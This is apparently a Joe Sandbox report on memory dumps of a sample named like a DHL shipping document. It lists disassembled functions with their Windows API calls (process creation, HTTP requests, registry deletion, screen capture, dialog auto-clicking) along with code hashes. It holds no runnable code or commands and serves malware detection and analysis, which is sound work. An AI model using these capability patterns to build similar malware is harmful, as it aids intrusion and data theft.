Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
API String ID: 221274066-762882726
Opcode ID: ba482076a2a4ca5b7279fc1e5ecb6ddbda0f782f717f28288b174779a61ffc8b
Instruction ID: efb91645e64adb22607587e5b929b1586938aa58ea8792664ce4d361aca5b4b6
Opcode Fuzzy Hash: ba482076a2a4ca5b7279fc1e5ecb6ddbda0f782f717f28288b174779a61ffc8b
Instruction Fuzzy Hash: 97616A71108305AFC701DFA5DE85EAFBBF8EF98750F100A1DF595921A0DB309A49CB52

Function 00AEAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AEB198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AEB1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AEB1D4
_wcslen.LIBCMT ref: 00AEB200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AEB214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AEB236
_wcslen.LIBCMT ref: 00AEB332

Part of subcall function 00AD05A7: GetStdHandle.KERNEL32(000000F6), ref: 00AD05C6

_wcslen.LIBCMT ref: 00AEB34B
_wcslen.LIBCMT ref: 00AEB366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AEB3B6
GetLastError.KERNEL32(00000000), ref: 00AEB407
CloseHandle.KERNEL32(?), ref: 00AEB439
CloseHandle.KERNEL32(00000000), ref: 00AEB44A
CloseHandle.KERNEL32(00000000), ref: 00AEB45C
CloseHandle.KERNEL32(00000000), ref: 00AEB46E
CloseHandle.KERNEL32(?), ref: 00AEB4E3

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 622fca655644c3c74b853d51b52e6040bfd04a63ce5a965c566730e3cbbb205c
Instruction ID: ff73564d02f13747a463f0452e86984849b57a6f559ef825d7c4fe878f3a7804
Opcode Fuzzy Hash: 622fca655644c3c74b853d51b52e6040bfd04a63ce5a965c566730e3cbbb205c
Instruction Fuzzy Hash: 86F1BD316183409FC714EF25C995B6FBBE1AF85314F14855DF89A8B2A2DB30EC40CB62

Function 00A6326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00B31990), ref: 00AA2F8D
GetMenuItemCount.USER32(00B31990), ref: 00AA303D
GetCursorPos.USER32(?), ref: 00AA3081
SetForegroundWindow.USER32(00000000), ref: 00AA308A
TrackPopupMenuEx.USER32(00B31990,00000000,?,00000000,00000000,00000000), ref: 00AA309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AA30A9

Strings

0, xrefs: 00A6327D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: b0aea859d18a1c9cd7ae8a6990be98490f736c154b0f6504c4ea1f1f531bccfe
Instruction ID: f8fb530d6912c88ff5b728d47ed14dd33c9f4daab37cec048e2bec59aac16382
Opcode Fuzzy Hash: b0aea859d18a1c9cd7ae8a6990be98490f736c154b0f6504c4ea1f1f531bccfe
Instruction Fuzzy Hash: F4710471644209BEEF258F69CD49FAABF74FF05324F204206F525AB1E0C7B1A964DB90

Function 00ADC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00ADC4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00ADC4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00ADC4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00ADC4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00ADC533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00ADC549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00ADC554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00ADC584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00ADC5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00ADC5F0
InternetCloseHandle.WININET(00000000), ref: 00ADC5FB

Strings

, xrefs: 00ADC575

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 0dd2523e6460dae46573e778e680c3623ad8816e42424d26aea93ca4671d3ede
Instruction ID: 3113316f29f273a1467ea08144a1f7f455ac43033756fcd40c9e453d4858a59d
Opcode Fuzzy Hash: 0dd2523e6460dae46573e778e680c3623ad8816e42424d26aea93ca4671d3ede
Instruction Fuzzy Hash: 6E515AB154020ABFDB21DFA1DA88ABB7BBCFF08764F40451AF94696210DB34E945DB60

Function 00AD14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00AD1502
VariantCopy.OLEAUT32(?,?), ref: 00AD150B
VariantClear.OLEAUT32(?), ref: 00AD1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00AD15FB
VarR8FromDec.OLEAUT32(?,?), ref: 00AD1657
VariantInit.OLEAUT32(?), ref: 00AD1708
SysFreeString.OLEAUT32(?), ref: 00AD178C
VariantClear.OLEAUT32(?), ref: 00AD17D8
VariantClear.OLEAUT32(?), ref: 00AD17E7
VariantInit.OLEAUT32(00000000), ref: 00AD1823

Strings

Default, xrefs: 00AD16AF
%4d%02d%02d%02d%02d%02d, xrefs: 00AD1625

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 1c725b3df7b80aabe41d29e1fdc0144e1f6edd8bc3b29aecf31ae2dfff691bd0
Instruction ID: 1ff28726e7810a9d054a6fe4e9962cff8d0248b472d0aa7d112eb121adafea5c
Opcode Fuzzy Hash: 1c725b3df7b80aabe41d29e1fdc0144e1f6edd8bc3b29aecf31ae2dfff691bd0
Instruction Fuzzy Hash: 62D1ED72A00215FBDB109FA5E989B79B7B5BF45700F10805BF40BAB291DB38ED41DB62

Function 00AEB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

Part of subcall function 00AEC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEB6AE,?,?), ref: 00AEC9B5
Part of subcall function 00AEC998: _wcslen.LIBCMT ref: 00AEC9F1
Part of subcall function 00AEC998: _wcslen.LIBCMT ref: 00AECA68
Part of subcall function 00AEC998: _wcslen.LIBCMT ref: 00AECA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AEB6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AEB772
RegDeleteValueW.ADVAPI32(?,?), ref: 00AEB80A
RegCloseKey.ADVAPI32(?), ref: 00AEB87E
RegCloseKey.ADVAPI32(?), ref: 00AEB89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00AEB8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AEB904
RegDeleteKeyW.ADVAPI32(?,?), ref: 00AEB922
FreeLibrary.KERNEL32(00000000), ref: 00AEB983
RegCloseKey.ADVAPI32(00000000), ref: 00AEB994

Strings

RegDeleteKeyExW, xrefs: 00AEB8FE
advapi32.dll, xrefs: 00AEB8ED

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: f88df34fbe34c9f8cb0af3a6093c177a76695746199baf40908c5e81dee06c33
Instruction ID: 702989ea63e0caf1275c25484b088c342da7de3d764d04e13bd3aaf64b476abe
Opcode Fuzzy Hash: f88df34fbe34c9f8cb0af3a6093c177a76695746199baf40908c5e81dee06c33
Instruction Fuzzy Hash: EBC17C30214241AFD710DF65C599F2ABBF5BF84318F14859CE49A8B7A2CB71EC46CBA1

Function 00AF541D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00AF5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AF5515
CharNextW.USER32(00000158), ref: 00AF5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00AF5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00AF559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AF55AC

Strings

@U=u, xrefs: 00AF5504, 00AF5515, 00AF554A, 00AF55C9, 00AF562B, 00AF5816

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$CharNext
String ID: @U=u
API String ID: 1350042424-2594219639
Opcode ID: 39b9b270b637880bf146c65491f508faebbbc992d1b505ce9f237a1ec483e0cc
Instruction ID: aac6f29e6b2d05fe1ec4c2c1b35d38b889da7c1df2fe8969f085ed9a0a87df70
Opcode Fuzzy Hash: 39b9b270b637880bf146c65491f508faebbbc992d1b505ce9f237a1ec483e0cc
Instruction Fuzzy Hash: 43614B34D0460CABDF10DFE5CD84AFE7BB9AB05725F108149FB25AA290D7749A81DB60

Function 00AE255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00AE25D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00AE25E8
CreateCompatibleDC.GDI32(?), ref: 00AE25F4
SelectObject.GDI32(00000000,?), ref: 00AE2601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00AE266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00AE26AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00AE26D0
SelectObject.GDI32(?,?), ref: 00AE26D8
DeleteObject.GDI32(?), ref: 00AE26E1
DeleteDC.GDI32(?), ref: 00AE26E8
ReleaseDC.USER32(00000000,?), ref: 00AE26F3

Strings

(, xrefs: 00AE268D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 96a47148864ef17c0340ab4fac3562c1e0734d323cc0237c11dc540b5d7ea49f
Instruction ID: bcc2ac73aa54eb0c779d7f0f0b88f88c5010d8b391a6f5c487efeecc7cafc586
Opcode Fuzzy Hash: 96a47148864ef17c0340ab4fac3562c1e0734d323cc0237c11dc540b5d7ea49f
Instruction Fuzzy Hash: F761E175D00219EFCF14CFE9D984AAEBBB9FF48310F208529E955A7250E770A951CF60

Function 00ACE6B0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00ACE6B4

Part of subcall function 00A7E551: timeGetTime.WINMM(?,?,00ACE6D4), ref: 00A7E555

Sleep.KERNEL32(0000000A), ref: 00ACE6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00ACE705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00ACE727
SetActiveWindow.USER32 ref: 00ACE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00ACE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 00ACE773
Sleep.KERNEL32(000000FA), ref: 00ACE77E
IsWindow.USER32 ref: 00ACE78A
EndDialog.USER32(00000000), ref: 00ACE79B

Strings

@U=u, xrefs: 00ACE754, 00ACE773
BUTTON, xrefs: 00ACE719

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: @U=u$BUTTON
API String ID: 1194449130-2582809321
Opcode ID: 78bc2821d36c8509d76ae44be3a7b2cae161de08f792e19e82ed8a87c8e2a19e
Instruction ID: b487dea8e806db11033aef605aeecb2bc3b82d5a65e807e210a46cb58658d5da
Opcode Fuzzy Hash: 78bc2821d36c8509d76ae44be3a7b2cae161de08f792e19e82ed8a87c8e2a19e
Instruction Fuzzy Hash: EB2181B1200608AFEB00DFA6ED8AF393B69FB54758B215828F405D31B1DF71AC11CA24

Function 00A9DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00A9DAA1

Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D659
Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D66B
Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D67D
Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D68F
Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D6A1
Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D6B3
Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D6C5
Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D6D7
Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D6E9
Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D6FB
Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D70D
Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D71F
Part of subcall function 00A9D63C: _free.LIBCMT ref: 00A9D731

_free.LIBCMT ref: 00A9DA96

Part of subcall function 00A929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9D7D1,00000000,00000000,00000000,00000000,?,00A9D7F8,00000000,00000007,00000000,?,00A9DBF5,00000000), ref: 00A929DE
Part of subcall function 00A929C8: GetLastError.KERNEL32(00000000,?,00A9D7D1,00000000,00000000,00000000,00000000,?,00A9D7F8,00000000,00000007,00000000,?,00A9DBF5,00000000,00000000), ref: 00A929F0

_free.LIBCMT ref: 00A9DAB8
_free.LIBCMT ref: 00A9DACD
_free.LIBCMT ref: 00A9DAD8
_free.LIBCMT ref: 00A9DAFA
_free.LIBCMT ref: 00A9DB0D
_free.LIBCMT ref: 00A9DB1B
_free.LIBCMT ref: 00A9DB26
_free.LIBCMT ref: 00A9DB5E
_free.LIBCMT ref: 00A9DB65
_free.LIBCMT ref: 00A9DB82
_free.LIBCMT ref: 00A9DB9A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 1d51f7faf58cad7b3ed1582b1c0a83808bfd06e46d6c3fe5ccdcba8eb6b2baca
Instruction ID: 42ab49157b10d594e6fbcf994a8a16acdd6c4a6fdf0e647dab1c95ad62346bdd
Opcode Fuzzy Hash: 1d51f7faf58cad7b3ed1582b1c0a83808bfd06e46d6c3fe5ccdcba8eb6b2baca
Instruction Fuzzy Hash: 85314832704305AFEF22AB39E945B5ABBE9FF50360F554429E449EB191DF31AC90CB60

Function 00AC365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00AC369C
_wcslen.LIBCMT ref: 00AC36A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00AC3797
GetClassNameW.USER32(?,?,00000400), ref: 00AC380C
GetDlgCtrlID.USER32(?), ref: 00AC385D
GetWindowRect.USER32(?,?), ref: 00AC3882
GetParent.USER32(?), ref: 00AC38A0
ScreenToClient.USER32(00000000), ref: 00AC38A7
GetClassNameW.USER32(?,?,00000100), ref: 00AC3921
GetWindowTextW.USER32(?,?,00000400), ref: 00AC395D

Strings

%s%u, xrefs: 00AC3734

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: f82ea473dd847c79a9f92dd99e2b84f65249404d0c7d34ab3e4024294566151a
Instruction ID: 38602f1179101292dd08337edac6a5dbac3d484ac75c0091c25b5bf5bd112fa4
Opcode Fuzzy Hash: f82ea473dd847c79a9f92dd99e2b84f65249404d0c7d34ab3e4024294566151a
Instruction Fuzzy Hash: 1391D172204606AFDB18DF64C995FEAF7A8FF44350F01862DF999D2190DB30EA46CB91

Function 00AC4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00AC4994
GetWindowTextW.USER32(?,?,00000400), ref: 00AC49DA
_wcslen.LIBCMT ref: 00AC49EB
CharUpperBuffW.USER32(?,00000000), ref: 00AC49F7
_wcsstr.LIBVCRUNTIME ref: 00AC4A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00AC4A64
GetWindowTextW.USER32(?,?,00000400), ref: 00AC4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00AC4AE6
GetClassNameW.USER32(?,?,00000400), ref: 00AC4B20
GetWindowRect.USER32(?,?), ref: 00AC4B8B

Strings

ThumbnailClass, xrefs: 00AC4A6F, 00AC4AF1

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 95b32920434065ec4a965f0cf60e50c311f0cec07654f6a140f6c565fd748677
Instruction ID: ff744903eaf74dde8652971e990f06ac324d5d6cf0bbbc30b76aaaecaa38c1da
Opcode Fuzzy Hash: 95b32920434065ec4a965f0cf60e50c311f0cec07654f6a140f6c565fd748677
Instruction Fuzzy Hash: AB91FE710082099FDB04DF14CA90FAA7BE8FF88350F05846DFD859A0A6EB30ED45CBA5

Function 00AF8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A79BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A79BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AF8D5A
GetFocus.USER32 ref: 00AF8D6A
GetDlgCtrlID.USER32(00000000), ref: 00AF8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00AF8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AF8ECF
GetMenuItemCount.USER32(?), ref: 00AF8EEC
GetMenuItemID.USER32(?,00000000), ref: 00AF8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AF8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AF8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AF8FA1

Strings

0, xrefs: 00AF8E9F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 8e0063432bb648642467bab17fa795a13b79ec2c7e8fb33264263faefb670d6a
Instruction ID: 456b5f07a469311797b15ad1f29cba896b3d21e05590cd450f7810238fbd8c7e
Opcode Fuzzy Hash: 8e0063432bb648642467bab17fa795a13b79ec2c7e8fb33264263faefb670d6a
Instruction Fuzzy Hash: 3381BF715083099FDB10CFA4C984ABBBBE9FF88764F144959FA84D7291DB34D901CBA1

Function 00ACDC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00ACDC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00ACDC46
_wcslen.LIBCMT ref: 00ACDC50
_wcsstr.LIBVCRUNTIME ref: 00ACDCA0
